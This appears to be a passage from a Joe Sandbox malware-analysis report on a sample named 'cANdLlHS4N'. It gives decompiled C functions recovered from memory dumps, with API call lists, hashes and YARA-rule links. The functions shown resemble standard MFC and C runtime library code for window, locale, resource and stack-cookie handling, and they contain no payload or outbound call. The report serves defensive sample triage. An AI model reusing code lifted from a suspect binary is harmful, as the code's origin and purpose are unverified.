      			E009A7B6A(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __ebp;
				int _t47;
				void* _t54;
				signed int _t63;
				intOrPtr* _t66;
				intOrPtr _t67;
				int _t69;
				intOrPtr* _t75;

				_t65 = __ecx;
				_push(__ecx);
				_t75 = __ecx;
				_t67 = E009AD852(__ecx);
				_v8 = _t67;
				if(_t67 == 0) {
					E009B8782(_t65);
				}
				_t66 =  *((intOrPtr*)(_t75 + 0xa0));
				_t63 = _a8;
				_t69 = _a4;
				if(_t66 == 0) {
					L5:
					if(_t63 != 0xffff) {
						if( *(_t75 + 0xfc) != 0) {
							 *(_t75 + 0xfc) =  *(_t75 + 0xfc) & 0x00000000;
							if((_t63 & 0x00002000) != 0 && ( *(_t75 + 0xf0) & 0x00000001) == 0) {
								_t66 = _t75;
								 *((intOrPtr*)( *_t75 + 0x184))(2);
								_t67 = _v8;
							}
						}
						if(_t69 == 0 || (_t63 & 0x00000810) != 0) {
							 *(_t75 + 0xc8) =  *(_t75 + 0xc8) & 0x00000000;
							goto L29;
						} else {
							if(_t69 - 0xf000 > 0x1ef) {
								if(_t69 < 0xff00) {
									L25:
									 *(_t75 + 0xc8) = _t69;
									L29:
									 *(_t67 + 0x58) =  *(_t67 + 0x58) | 0x00000040;
									L30:
									_t47 =  *(_t75 + 0xc8);
									if(_t47 !=  *((intOrPtr*)(_t75 + 0xcc))) {
										_t47 = E009AC90B(_t63, _t66, _t67, GetParent( *(_t75 + 0x20)));
										if(_t47 != 0) {
											_t47 = PostMessageA( *(_t75 + 0x20), 0x36a, 0, 0);
										}
									}
									L33:
									return _t47;
								}
								 *(_t75 + 0xc8) = 0xef1f;
								goto L29;
							}
							_t69 = (_t69 + 0xffff1000 >> 4) + 0xef00;
							goto L25;
						}
					}
					 *(_t75 + 0x58) =  *(_t75 + 0x58) & 0xffffffbf;
					if( *((intOrPtr*)(_t67 + 0x88)) != 0) {
						 *(_t75 + 0xc8) = 0xe002;
					} else {
						 *(_t75 + 0xc8) = 0xe001;
					}
					SendMessageA( *(_t75 + 0x20), 0x362,  *(_t75 + 0xc8), 0);
					_t66 = _t75;
					_t54 =  *((intOrPtr*)( *_t75 + 0x190))();
					if(_t54 != 0) {
						UpdateWindow( *(_t54 + 0x20));
					}
					if(_a12 == 0 && ( *(_t75 + 0xf0) & 0x00000001) == 0 && GetKeyState(0x79) >= 0 && GetKeyState(0x12) >= 0 &&  *((intOrPtr*)(_t75 + 0x100)) == 0) {
						_t66 = _t75;
						 *((intOrPtr*)( *_t75 + 0x184))(2);
					}
					goto L30;
				}
				_t47 =  *((intOrPtr*)( *_t66 + 0x7c))(_t69, _t63, _a12);
				if(_t47 != 0) {
					goto L33;
				} else {
					_t67 = _v8;
					goto L5;
				}
			}













      0x009a7b6a
      0x009a7b6f
      0x009a7b73
      0x009a7b7a
      0x009a7b7c
      0x009a7b81
      0x009a7b83
      0x009a7b83
      0x009a7b88
      0x009a7b8e
      0x009a7b91
      0x009a7b96
      0x009a7bad
      0x009a7bb3
      0x009a7c62
      0x009a7c64
      0x009a7c71
      0x009a7c80
      0x009a7c82
      0x009a7c88
      0x009a7c88
      0x009a7c71
      0x009a7c8d
      0x009a7ccf
      0x00000000
      0x009a7c97
      0x009a7ca2
      0x009a7cc1
      0x009a7cb3
      0x009a7cb3
      0x009a7cd6
      0x009a7cd6
      0x009a7cda
      0x009a7cda
      0x009a7ce6
      0x009a7cf2
      0x009a7cf9
      0x009a7d07
      0x009a7d07
      0x009a7cf9
      0x009a7d0d
      0x009a7d11
      0x009a7d11
      0x009a7cc3
      0x00000000
      0x009a7cc3
      0x009a7cad
      0x00000000
      0x009a7cad
      0x009a7c8d
      0x009a7bb9
      0x009a7bc4
      0x009a7bd2
      0x009a7bc6
      0x009a7bc6
      0x009a7bc6
      0x009a7bec
      0x009a7bf4
      0x009a7bf6
      0x009a7bfe
      0x009a7c03
      0x009a7c03
      0x009a7c0d
      0x009a7c51
      0x009a7c53
      0x009a7c53
      0x00000000
      0x009a7c0d
      0x009a7b9f
      0x009a7ba4
      0x00000000
      0x009a7baa
      0x009a7baa
      0x00000000
      0x009a7baa

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageState$Exception@8ParentPostSendThrowUpdateWindow
      • String ID:
      • API String ID: 3830675576-0
      • Opcode ID: 14ec493302b7de83f00065b33bcd156d6f4c9e839689e209c73a22dc8f1879e2
      • Instruction ID: abe944925509245d4f9fb8aeb25fd385684034ca57a06f9d70e16152d02eb48d
      • Opcode Fuzzy Hash: 14ec493302b7de83f00065b33bcd156d6f4c9e839689e209c73a22dc8f1879e2
      • Instruction Fuzzy Hash: 6541D471604705DFE7208FA0CC4AFAAF7B9FF41765F108928E49A57291DBB4AC41CB90
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B1AD1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON
      Download Yara Rule
      C-Code - Quality: 78%
      			E009B1AD1(void* __ecx, void* __edx, int _a4) {
				signed int _v8;
				char _v284;
				char _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HINSTANCE__* _t13;
				intOrPtr* _t20;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t36;
				signed int _t37;
				void* _t39;
				void* _t40;
				signed int _t45;
				void* _t46;

				_t35 = __edx;
				_t31 = __ecx;
				_t43 = _t45;
				_t46 = _t45 - 0x11c;
				_t9 =  *0xd0c910; // 0x3a0e8b0c
				_v8 = _t9 ^ _t45;
				_t49 = _a4 - 0x800;
				_t39 = __ecx;
				_t28 = __edx;
				if(_a4 != 0x800) {
					__eflags = GetLocaleInfoA(_a4, 3,  &_v288, 4);
					if(__eflags == 0) {
						goto L10;
					} else {
						goto L4;
					}
				} else {
					E009A6677(_t31, E00AAF201( &_v288, 4, "LOC"));
					_t46 = _t46 + 0x10;
					L4:
					_push(_t36);
					_t37 =  *(E00AADB06(_t49));
					 *(E00AADB06(_t49)) =  *_t16 & 0x00000000;
					_push( &_v288);
					_t30 = E00AADA2A( &_v284, 0x112, 0x111, _t39, _t28);
					_t20 = E00AADB06(_t49);
					_t50 =  *_t20;
					if( *_t20 == 0) {
						 *(E00AADB06(__eflags)) = _t37;
					} else {
						E009A9F23( *((intOrPtr*)(E00AADB06(_t50))));
					}
					_pop(_t36);
					if(_t30 == 0xffffffff || _t30 >= 0x112) {
						L10:
						_t13 = 0;
						__eflags = 0;
					} else {
						_t13 = LoadLibraryA( &_v284);
					}
				}
				_pop(_t40);
				_pop(_t29);
				return E00AAB46A(_t13, _t29, _v8 ^ _t43, _t35, _t36, _t40);
			}






















      0x009b1ad1
      0x009b1ad1
      0x009b1ad4
      0x009b1ad6
      0x009b1adc
      0x009b1ae3
      0x009b1ae6
      0x009b1aef
      0x009b1af1
      0x009b1af9
      0x009b1b21
      0x009b1b23
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b1afb
      0x009b1b09
      0x009b1b0e
      0x009b1b25
      0x009b1b25
      0x009b1b2b
      0x009b1b32
      0x009b1b3b
      0x009b1b58
      0x009b1b5a
      0x009b1b5f
      0x009b1b62
      0x009b1b78
      0x009b1b64
      0x009b1b6b
      0x009b1b70
      0x009b1b7a
      0x009b1b7e
      0x009b1b93
      0x009b1b93
      0x009b1b93
      0x009b1b84
      0x009b1b8b
      0x009b1b8b
      0x009b1b7e
      0x009b1b98
      0x009b1b9b
      0x009b1ba2

      APIs
      • _strcpy_s.LIBCMT ref: 009B1B03
        • Part of subcall function 00AADB06: __getptd_noexit.LIBCMT ref: 00AADB06
      • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 009B1B1B
      • __snwprintf_s.LIBCMT ref: 009B1B50
      • LoadLibraryA.KERNEL32(?), ref: 009B1B8B
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InfoLibraryLoadLocale__getptd_noexit__snwprintf_s_strcpy_s
      • String ID: LOC
      • API String ID: 1155623865-519433814
      • Opcode ID: 5d852d04a39454c8e15b31c58aa442126f38931902ba0af098ab7b92423d84c9
      • Instruction ID: a80b6618dbbf96cdd3366387cdce1bff86caf91387233a5dfe2c92d2a536e05c
      • Opcode Fuzzy Hash: 5d852d04a39454c8e15b31c58aa442126f38931902ba0af098ab7b92423d84c9
      • Instruction Fuzzy Hash: 8D210672600218AFDB14AB70DD4AFE937ACAF46360F5044B1F616A70E1EB748E05CAA0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AC2663 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 100%
      			E00AC2663(void* __edi, char* __esi) {
				short _v8;
				void* _t24;

				_t24 = __edi;
				if(__esi == 0 ||  *__esi == 0 || E00AB3030(__esi, ?str?) == 0) {
					if(GetLocaleInfoW( *(_t24 + 0x1c), 0x20001004,  &_v8, 2) != 0) {
						if(_v8 != 0) {
							goto L5;
						} else {
							return GetACP();
						}
					} else {
						goto L8;
					}
				} else {
					if(E00AB3030(__esi, ?str?) != 0) {
						_v8 = E00AB0101(__esi);
						goto L5;
					} else {
						if(GetLocaleInfoW( *(__edi + 0x1c), 0x2000000b,  &_v8, 2) == 0) {
							L8:
							return 0;
						} else {
							L5:
							return _v8;
						}
					}
				}
			}





      0x00ac2663
      0x00ac266b
      0x00ac26d3
      0x00ac26dd
      0x00000000
      0x00ac26df
      0x00ac26e6
      0x00ac26e6
      0x00000000
      0x00000000
      0x00000000
      0x00ac2683
      0x00ac2692
      0x00ac26b8
      0x00000000
      0x00ac2694
      0x00ac26aa
      0x00ac26d5
      0x00ac26d8
      0x00ac26ac
      0x00ac26ac
      0x00ac26b0
      0x00ac26b0
      0x00ac26aa
      0x00ac2692

      APIs
      • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000,00000000), ref: 00AC26A2
      • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000,00000000), ref: 00AC26CB
      • GetACP.KERNEL32(?,?,00AC2CA0,?,00ABA8C0,?,000000BC,?,00000001,00000000), ref: 00AC26DF
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: InfoLocale
      • String ID: ACP$OCP
      • API String ID: 2299586839-711371036
      • Opcode ID: a30e11c49da5140f9a4c4614921d321668e239b6a6e30b989d469bbff5bfcf60
      • Instruction ID: 48850e7120964201bf64e7cfcde60145f14253c19f46c734f31b8aba5b5cc3ef
      • Opcode Fuzzy Hash: a30e11c49da5140f9a4c4614921d321668e239b6a6e30b989d469bbff5bfcf60
      • Instruction Fuzzy Hash: DA01F73160220EBFEB21DBA5ED45F9A37A8EF00758F200059F502E40D1EB74DA82A768
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00AAB46A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
      Download Yara Rule
      C-Code - Quality: 85%
      			E00AAB46A(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0xd0c910; // 0x3a0e8b0c
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0xd13808 = _t6;
				 *0xd13804 = _t22;
				 *0xd13800 = _t25;
				 *0xd137fc = _t21;
				 *0xd137f8 = _t27;
				 *0xd137f4 = _t26;
				 *0xd13820 = ss;
				 *0xd13814 = cs;
				 *0xd137f0 = ds;
				 *0xd137ec = es;
				 *0xd137e8 = fs;
				 *0xd137e4 = gs;
				asm("pushfd");
				_pop( *0xd13818);
				 *0xd1380c =  *_t31;
				 *0xd13810 = _v0;
				 *0xd1381c =  &_a4;
				 *0xd13758 = 0x10001;
				_t11 =  *0xd13810; // 0x0
				 *0xd1370c = _t11;
				 *0xd13700 = 0xc0000409;
				 *0xd13704 = 1;
				_t12 =  *0xd0c910; // 0x3a0e8b0c
				_v812 = _t12;
				_t13 =  *0xd0c914; // 0xc5f174f3
				_v808 = _t13;
				 *0xd13750 = IsDebuggerPresent();
				_push(1);
				E00AC0028(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0xafbbe0);
				if( *0xd13750 == 0) {
					_push(1);
					E00AC0028(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















      0x00aab46a
      0x00aab46a
      0x00aab46a
      0x00aab46a
      0x00aab46a
      0x00aab46a
      0x00aab46a
      0x00aab470
      0x00aab472
      0x00aab472
      0x00ab3290
      0x00ab3295
      0x00ab329b
      0x00ab32a1
      0x00ab32a7
      0x00ab32ad
      0x00ab32b3
      0x00ab32ba
      0x00ab32c1
      0x00ab32c8
      0x00ab32cf
      0x00ab32d6
      0x00ab32dd
      0x00ab32de
      0x00ab32e7
      0x00ab32ef
      0x00ab32f7
      0x00ab3302
      0x00ab330c
      0x00ab3311
      0x00ab3316
      0x00ab3320
      0x00ab332a
      0x00ab332f
      0x00ab3335
      0x00ab333a
      0x00ab3346
      0x00ab334b
      0x00ab334d
      0x00ab3355
      0x00ab3360
      0x00ab336d
      0x00ab336f
      0x00ab3371
      0x00ab3376
      0x00ab338a

      APIs
      • IsDebuggerPresent.KERNEL32 ref: 00AB3340
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AB3355
      • UnhandledExceptionFilter.KERNEL32(00AFBBE0), ref: 00AB3360
      • GetCurrentProcess.KERNEL32(C0000409), ref: 00AB337C
      • TerminateProcess.KERNEL32(00000000), ref: 00AB3383
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 20ec0fbb0921ef673eb215207abd02d266df37597b8257d4e302e6bdf3e6b16b
      • Instruction ID: d9d6053d0cadbb971780a16d150851c447966b3efb37336cbc165b5e6a2d3830
      • Opcode Fuzzy Hash: 20ec0fbb0921ef673eb215207abd02d266df37597b8257d4e302e6bdf3e6b16b
      • Instruction Fuzzy Hash: 3621ADF4912304EFC701DFA4E945A947BF8FB08301F50952AE519D73A1EBB19A82CFA5
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009AD29D Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
      Download Yara Rule
      C-Code - Quality: 88%
      			E009AD29D(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;

				_t15 = __ecx;
				if((E009B0A7A(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E009AC865(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t18 = E009A6B56();
				if(_t18 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t18 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}








      0x009ad2a2
      0x009ad2ae
      0x009ad2f6
      0x009ad2f8
      0x009ad2ff
      0x00000000
      0x009ad301
      0x009ad2b5
      0x009ad2b9
      0x00000000
      0x009ad2dc
      0x009ad2eb
      0x00000000
      0x009ad2f3

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: State$LongMessageSendWindow
      • String ID:
      • API String ID: 1063413437-0
      • Opcode ID: c38f8a5a061c4cd2b2b781e02b272404a7818fb17295603198e46e68f1b26791
      • Instruction ID: 986c7ee2ff12aa74eb986f0ef74170d400a73b40912a7c059a966f8139b5f989
      • Opcode Fuzzy Hash: c38f8a5a061c4cd2b2b781e02b272404a7818fb17295603198e46e68f1b26791
      • Instruction Fuzzy Hash: 8DF0893574225F67DA2026B45D01FEA5918DFDABD5F0108357F63EA8D1DEA0D81291F0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009B508E Relevance: 4.5, APIs: 3, Instructions: 39COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009B508E(void* __ecx, CHAR* _a4, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t12;
				CHAR* _t16;
				void* _t17;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t22;

				_t16 = _a4;
				_t20 = __ecx;
				 *(__ecx + 0x78) = _t16;
				if((_t16 & 0xffff0000) == 0) {
					_t25 =  *(__ecx + 0x74);
					if( *(__ecx + 0x74) == 0) {
						 *(__ecx + 0x74) = _t16 & 0x0000ffff;
					}
				}
				_t22 =  *(E009BD77F(_t16, _t20, _t21, _t25) + 0xc);
				_t17 = LoadResource(_t22, FindResourceA(_t22, _t16, 5));
				_t12 = E009B504F(_t20, _t17, _a8, _t22);
				FreeResource(_t17);
				return _t12;
			}













      0x009b5094
      0x009b5099
      0x009b509b
      0x009b50a4
      0x009b50a6
      0x009b50aa
      0x009b50af
      0x009b50af
      0x009b50aa
      0x009b50b7
      0x009b50d0
      0x009b50d5
      0x009b50dd
      0x009b50e9

      APIs
      • FindResourceA.KERNEL32(?,?,00000005), ref: 009B50BE
      • LoadResource.KERNEL32(?,00000000,?,?,?,?,009A4781,?,?), ref: 009B50C6
      • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,009A4781,?,?), ref: 009B50DD
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Resource$FindFreeLoad
      • String ID:
      • API String ID: 934874419-0
      • Opcode ID: 096b0c058f825c41f5c6d2c6606a22c313a69052b1e7e3f3dccab4466d4c5afe
      • Instruction ID: 5c14d99125988f0fa7db4ff8ba475d6a8e8218a40113c3639434b8723b810d4c
      • Opcode Fuzzy Hash: 096b0c058f825c41f5c6d2c6606a22c313a69052b1e7e3f3dccab4466d4c5afe
      • Instruction Fuzzy Hash: E1F09072502614BBD7116BAA9D88AAAFBACFF58771B050016F509C7221CB749C4186E1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A836B Relevance: 3.0, APIs: 2, Instructions: 37windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E009A836B(void* __ecx, intOrPtr _a4) {
				void* _t4;
				intOrPtr _t13;
				void* _t15;

				_t13 = _a4;
				_t15 = __ecx;
				if(_t13 == 0xffffffff) {
					if(IsWindowVisible( *(__ecx + 0x20)) != 0) {
						if(IsIconic( *(_t15 + 0x20)) != 0) {
							_t13 = 9;
						}
					} else {
						_t13 = 1;
					}
				}
				_t4 = E009A68EB(_t15, _t13);
				if(_t13 == 0xffffffff) {
					return _t4;
				}
				E009B0BD1(_t15, _t13);
				return E009A68EB(_t15, _t13);
			}






      0x009a8372
      0x009a8375
      0x009a837a
      0x009a8387
      0x009a8399
      0x009a839d
      0x009a839d
      0x009a8389
      0x009a838b
      0x009a838b
      0x009a8387
      0x009a83a1
      0x009a83a9
      0x009a83be
      0x009a83be
      0x009a83ae
      0x00000000

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: IconicVisibleWindow
      • String ID:
      • API String ID: 1797901696-0
      • Opcode ID: ffe1edbec4084e8759dc60d069cbeae1ecc29cd47f8ee68821cb61b519d60abf
      • Instruction ID: 91633c7a2a27e089d24166f7a91e407c1d21c1e18f68dd6ad70b731f4708d801
      • Opcode Fuzzy Hash: ffe1edbec4084e8759dc60d069cbeae1ecc29cd47f8ee68821cb61b519d60abf
      • Instruction Fuzzy Hash: 9DF0823230061427CE20263A9D19A5FB66EBFD3F74715062AF56A921F0DEA0C80351D0
      Uniqueness

      Uniqueness Score: -1.00%

      Function 009A96B5 Relevance: 37.2, APIs: 19, Strings: 2, Instructions: 451windowstringCOMMON
      Download Yara Rule
      C-Code - Quality: 97%
      			E009A96B5(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t217;
				int _t249;
				signed int _t255;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t284;
				struct HBITMAP__* _t295;
				signed int _t298;
				intOrPtr _t299;
				signed int _t300;
				long _t301;
				signed int _t307;
				intOrPtr _t308;
				signed int _t309;
				signed int _t312;
				int _t394;
				struct tagMENUITEMINFOA _t396;
				signed int _t398;
				RECT* _t399;
				signed int _t400;
				void* _t402;
				void* _t405;

				_t405 = __eflags;
				_t392 = __edx;
				_push(0x188);
				E00AAD29B(0xac7ebc, __ebx, __edi, __esi);
				_t398 =  *(_t402 + 0xc);
				 *((intOrPtr*)(_t402 - 0x100)) = __ecx;
				 *((intOrPtr*)(_t402 - 0x124)) =  *((intOrPtr*)(_t402 + 0x10));
				E009A5D70(_t402 - 0xec, __edx, E009B9D52());
				 *((intOrPtr*)(_t402 - 4)) = 0;
				_t7 = lstrlenA("ReBarWindow32") + 1; // 0x1
				_t394 = _t7;
				GetClassNameA( *_t398, E009A5F20(0, _t402 - 0xec, _t392, _t394, _t394), _t394);
